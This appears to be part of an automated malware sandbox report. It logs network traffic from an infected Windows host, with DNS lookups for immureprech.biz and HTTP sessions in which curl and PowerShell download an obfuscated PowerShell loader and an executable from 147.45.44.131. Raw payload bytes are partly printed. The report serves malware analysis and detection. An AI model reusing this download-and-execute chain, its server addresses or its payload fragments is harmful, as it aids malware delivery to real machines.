Dec 12, 2024 17:34:02.950834036 CET	443	49714	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.999152899 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.999193907 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:02.999362946 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.999584913 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:02.999605894 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.244616985 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.244895935 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.245928049 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.245949984 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.246385098 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.247373104 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.247474909 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.247494936 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.247569084 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.247597933 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.247636080 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.247782946 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.248018026 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.248060942 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.901530027 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.901839972 CET	443	49715	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.901868105 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.902055025 CET	49715	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.997996092 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.998076916 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:03.998392105 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.998624086 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:03.998682022 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.255608082 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.255801916 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:04.257364988 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:04.257374048 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.257572889 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.258603096 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:04.258603096 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:04.258632898 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.877665043 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.877990007 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:04.878014088 CET	443	49716	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:04.878139019 CET	49716	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.299911022 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.299988985 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.300148964 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.300386906 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.300437927 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.548633099 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.548950911 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.549786091 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.549830914 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.550849915 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.551906109 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.552967072 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.553028107 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.553071022 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.553122044 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.553296089 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.553508997 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.553622007 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.553693056 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.553746939 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.554069042 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.554116011 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.554269075 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.554318905 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.554454088 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.554507017 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.554641962 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.554687023 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.554791927 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.554809093 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.554999113 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.555017948 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.555185080 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.555208921 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.555425882 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.555480957 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.555599928 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.555649042 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.555809021 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.555867910 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.555948973 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.555969954 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.556145906 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.556175947 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.556391954 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.556452036 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.556569099 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.556622982 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.556786060 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.556907892 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.557107925 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.557297945 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.557528973 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.557679892 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.557871103 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.558105946 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.558262110 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.598316908 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.598579884 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.598640919 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.598793030 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.598850965 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.598989010 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.599045038 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.599195004 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.599255085 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.599392891 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.599451065 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.599559069 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.599776030 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.599956036 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.600157976 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.600332975 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.600533962 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.600739956 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.600898981 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.601123095 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.601267099 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.601485014 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.601632118 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.601825953 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.642246962 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.642460108 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.642689943 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.642872095 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.643049002 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.643238068 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.643424988 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.643623114 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.643805027 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.686285019 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.686499119 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.686700106 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.686914921 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.730283022 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.784477949 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.784727097 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.784775019 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.784919024 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:05.784965992 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:05.898408890 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.334773064 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.335002899 CET	443	49717	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.335115910 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.335115910 CET	49717	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.337677956 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.337745905 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.337927103 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.338100910 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.338120937 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.579740047 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.579972982 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.580851078 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.580866098 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.581190109 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:08.582252979 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.582252979 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:08.582328081 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:09.472851992 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:09.473182917 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:09.473376036 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:09.474729061 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:09.474729061 CET	49718	443	192.168.11.20	172.67.207.38
Dec 12, 2024 17:34:09.474788904 CET	443	49718	172.67.207.38	192.168.11.20
Dec 12, 2024 17:34:09.474807024 CET	443	49718	172.67.207.38	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:33:58.764574051 CET	54334	53	192.168.11.20	1.1.1.1
Dec 12, 2024 17:33:58.913463116 CET	53	54334	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 17:33:58.764574051 CET	192.168.11.20	1.1.1.1	0xc78d	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 17:33:58.913463116 CET	1.1.1.1	192.168.11.20	0xc78d	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:33:58.913463116 CET	1.1.1.1	192.168.11.20	0xc78d	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

immureprech.biz

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49709	147.45.44.131	80	1844	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 17:33:55.587621927 CET	194	OUT	GET /infopage/bgfi.ps1 HTTP/1.1 Host: 147.45.44.131 User-Agent: curl/7.55.1 Accept: / X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Dec 12, 2024 17:33:55.809194088 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:33:55 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 14:54:49 GMT ETag: "fde-62913e55b5974" Accept-Ranges: bytes Content-Length: 4062 Data Raw: 0d 0a 24 47 78 47 74 62 41 35 67 36 50 20 3d 20 27 6c 6b 6a 31 4f 30 38 72 2b 72 77 43 42 42 4a 45 51 2b 50 48 72 30 49 46 4c 4d 43 43 71 43 66 39 42 59 4b 54 76 75 44 73 2b 4f 73 3d 27 0d 0a 24 63 50 49 6c 78 63 38 5a 6b 63 20 3d 20 27 41 6f 47 4b 72 4f 71 57 76 57 6d 55 64 4d 55 31 62 31 55 66 68 41 3d 3d 27 0d 0a 24 62 53 35 38 54 51 72 4f 73 4b 20 3d 20 27 6e 39 39 63 46 4d 35 34 4e 31 53 62 7a 44 6a 6d 34 59 6d 33 6b 2f 63 6c 71 2b 70 33 51 36 62 69 61 78 55 55 34 6c 5a 6c 30 5a 65 4e 4a 58 38 57 66 75 54 39 34 42 68 62 78 6d 54 73 78 55 6d 75 44 4a 4e 72 56 32 55 43 36 68 66 53 79 35 52 34 50 76 72 55 76 35 49 6b 36 56 71 4f 34 75 54 59 74 6b 2f 49 65 63 6c 65 67 75 62 6f 6a 41 78 74 46 42 38 36 48 49 6f 47 79 70 48 64 34 4e 70 41 5a 53 6d 58 68 77 4e 48 37 69 62 46 46 4d 77 4d 48 75 54 75 79 4a 6d 4e 73 55 53 47 77 47 34 38 36 2f 59 4a 6d 72 58 63 59 56 4c 53 4e 39 5a 64 2b 74 77 2b 62 6b 37 4a 73 41 33 64 44 59 37 6c 55 31 49 35 54 34 4c 6c 31 66 42 39 4b 58 6d 32 53 4f 52 6d 79 71 51 49 55 [TRUNCATED] Data Ascii: $GxGtbA5g6P = 'lkj1O08r+rwCBBJEQ+PHr0IFLMCCqCf9BYKTvuDs+Os='$cPIlxc8Zkc = 'AoGKrOqWvWmUdMU1b1UfhA=='$bS58TQrOsK = 'n99cFM54N1SbzDjm4Ym3k/clq+p3Q6biaxUU4lZl0ZeNJX8WfuT94BhbxmTsxUmuDJNrV2UC6hfSy5R4PvrUv5Ik6VqO4uTYtk/IeclegubojAxtFB86HIoGypHd4NpAZSmXhwNH7ibFFMwMHuTuyJmNsUSGwG486/YJmrXcYVLSN9Zd+tw+bk7JsA3dDY7lU1I5T4Ll1fB9KXm2SORmyqQIUPXcREqKt6nssoWmwdBJCNPlRi9V9c0t3WYL1OhxVDrhWP8eJTHT4cAfrE6ph5F9XlOJNHNkgrYo9t06zHXuEUYupZSOC+mgMprq0qgushwBI2UHKhr4KFpySuCNl13Lk97M9Tt4bP3R2FApynJ8Es+nA5TIywJ/YbNVXXFecrCGi4vITP+eAdfo6/dPIymJBGvfnMNUmxs/xOOxKSQWNOcrnMOrRbnXkHMDL9l3fJg4O4EIGZEreMCYpwPNNwORWp/djz5/qdWmXDVKvIPrNhYUcvf/UYF1/lRZHt7ob1l3aYzUOTX186LRDp+GvUpya5K30tSCakxnaSfJS2IhKayIqC9UBOerlIKHQdhWN4zvDIjYQoQdq3zaNzeW4/GaSHcW/Mu8A9qSV6EdLhREmQ9Afu111FAOKmE1QWSCAHSiTbjVZtuUpMaMFd6wFd1aVzj8tw6tN3R6xgmIl2mF1ThKG+mCrpQ9J8IH+MS8Mksr3HHZc41Y+sj9D/kerAmdsWs1wP2/SvQ3CrexJym5k3NHxi0HJJYkqBcNYgd70LSydtOrRVYbIOCFN5mKja2HsINv/7mGdIIaAVFtlhscxqgr99xpHHTAM8Qaiyej74yHWohpVLoYDF8OOdJH2ueobbZ1U/TWvzxLcXxRBc6CykDt0hXdc+4c4Hu [TRUNCATED]
Dec 12, 2024 17:33:55.809232950 CET	1289	IN	Data Raw: 4b 53 54 36 7a 43 34 77 6f 69 32 79 71 42 37 34 56 70 72 61 59 54 74 6d 46 44 2b 2b 4a 5a 55 74 51 64 34 6e 58 67 57 61 34 61 75 67 6f 6d 74 4d 51 30 68 62 79 50 6e 70 47 72 58 48 46 39 47 58 4a 75 46 72 57 51 33 44 55 34 65 59 4f 48 4d 38 68 41 Data Ascii: KST6zC4woi2yqB74VpraYTtmFD++JZUtQd4nXgWa4augomtMQ0hbyPnpGrXHF9GXJuFrWQ3DU4eYOHM8hARCZiDZjmdek6J2NBTUBqnQLYMuSX0LlfV4ySt4mtAysMidNeu0h3NEnD9CCQYRJ4C6jkS1cw7CHSZ/xfhg0KA1TsZDN4EnQ7W/OTTs8HikgOoIITOpyEzcdPsOf8x8SPvQxhcHS+tj/gypOX2Fqn5QrdY9IeOzHPW
Dec 12, 2024 17:33:55.809247017 CET	1289	IN	Data Raw: 62 53 79 55 7a 33 6b 42 44 78 6c 51 78 76 6b 7a 4d 70 50 54 74 49 59 39 75 46 52 31 36 30 34 79 7a 44 46 59 79 52 45 6e 78 66 6b 5a 31 59 47 67 70 6a 46 39 50 62 58 42 4f 67 56 62 49 4c 64 62 79 76 58 7a 41 39 7a 6d 6c 47 75 5a 68 41 72 39 34 4d Data Ascii: bSyUz3kBDxlQxvkzMpPTtIY9uFR1604yzDFYyREnxfkZ1YGgpjF9PbXBOgVbILdbyvXzA9zmlGuZhAr94M5ihRVlUPiVXFByLOLl5zp7vCI9C74Vznx9RMP3mo0qgfMOzFg0KYCxrr6ap4qAJjmeACRIlP/Ny0Rb5XSfu9pHwp4VTOkQh9JNLVWGvfJ71NGpGTlvielM4tqQFnwmj05IKoOQQaELNgBoAr4Aspjf/dE1X1jClUv
Dec 12, 2024 17:33:55.809257984 CET	400	IN	Data Raw: 2c 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 43 72 79 70 74 6f 53 74 72 65 61 6d 4d 6f 64 65 5d 3a 3a 52 65 61 64 29 0d 0a 20 20 20 20 24 4a 6a 36 6e 48 72 7a 4e 67 56 20 3d 20 4e 65 77 2d 4f 62 Data Ascii: , [System.Security.Cryptography.CryptoStreamMode]::Read) $Jj6nHrzNgV = New-Object System.IO.StreamReader($h5EJ59bdUe) $RxXhhJcBdb = $Jj6nHrzNgV.ReadToEnd() $Jj6nHrzNgV.Close() $h5EJ59bdUe.Close() $LjPjMFgohB.Close()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49710	147.45.44.131	80	5040	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 17:33:56.637471914 CET	180	OUT	GET /infopage/nghp.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Dec 12, 2024 17:33:56.856739044 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:33:56 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 14:33:42 GMT ETag: "b200-6291399decf3b" Accept-Ranges: bytes Content-Length: 45568 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 ca 14 bd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `O H.text `.rsrc@@.reloc@BH"0S(rp(o(r3p(os%oo~o~((0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &(0f(!o"iYpai
Dec 12, 2024 17:33:56.856750011 CET	1289	IN	Data Raw: 0c 16 0d 16 13 04 2b 28 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 23 00 00 0a 17 59 33 04 16 0d 2b 04 09 17 58 0d 11 04 17 58 13 04 11 04 02 8e 69 17 59 32 cf 12 02 02 8e 69 17 59 28 01 00 00 2b 08 2a 1e 02 28 16 00 00 0a 2a 1a 28 01 Data Ascii: +(aao#Y3+XXiY2iY(+((((0L(rp(o(rp(o(rp(oBSJBv4.0.30319l#~
Dec 12, 2024 17:33:56.856946945 CET	1289	IN	Data Raw: 6c 69 62 00 41 64 64 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 53 70 65 63 69 61 6c 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 43 6f 6d 70 69 6c 65 41 73 73 65 6d 62 6c 79 46 72 6f 6d 53 6f 75 72 63 65 00 67 65 74 5f 42 69 67 Data Ascii: libAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAt
Dec 12, 2024 17:33:56.857002020 CET	1289	IN	Data Raw: 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51 00 51 00 30 00 4a 00 76 00 62 00 6d 00 68 00 74 00 63 00 48 00 70 00 47 00 59 00 Data Ascii: cmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVV
Dec 12, 2024 17:33:56.857012033 CET	1289	IN	Data Raw: 64 00 47 00 52 00 6d 00 4e 00 50 00 52 00 6a 00 46 00 4f 00 57 00 6b 00 70 00 6e 00 64 00 46 00 6c 00 47 00 61 00 46 00 6c 00 53 00 52 00 6d 00 78 00 6a 00 53 00 47 00 4e 00 70 00 64 00 46 00 6c 00 43 00 62 00 45 00 31 00 68 00 55 00 33 00 70 00 Data Ascii: dGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tB
Dec 12, 2024 17:33:56.857022047 CET	1289	IN	Data Raw: 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 42 00 65 00 45 00 4e 00 43 00 62 00 47 00 39 00 50 00 55 00 55 00 4a 00 77 00 4e 00 45 00 52 00 46 Data Ascii: vUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNW
Dec 12, 2024 17:33:56.857042074 CET	1289	IN	Data Raw: 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 6c 00 6d 00 56 00 31 00 52 00 30 00 4c 00 30 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 33 00 52 00 32 00 59 00 55 00 4a 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 5a 00 43 00 Data Ascii: aVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDM
Dec 12, 2024 17:33:56.857053041 CET	1289	IN	Data Raw: 00 54 00 6c 00 4e 00 55 00 61 00 46 00 6c 00 4d 00 52 00 45 00 56 00 4a 00 64 00 56 00 63 00 77 00 53 00 6c 00 5a 00 45 00 56 00 6d 00 64 00 58 00 51 00 6a 00 41 00 30 00 51 00 6b 00 77 00 78 00 61 00 7a 00 64 00 68 00 51 00 6c 00 70 00 44 00 55 Data Ascii: TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQ
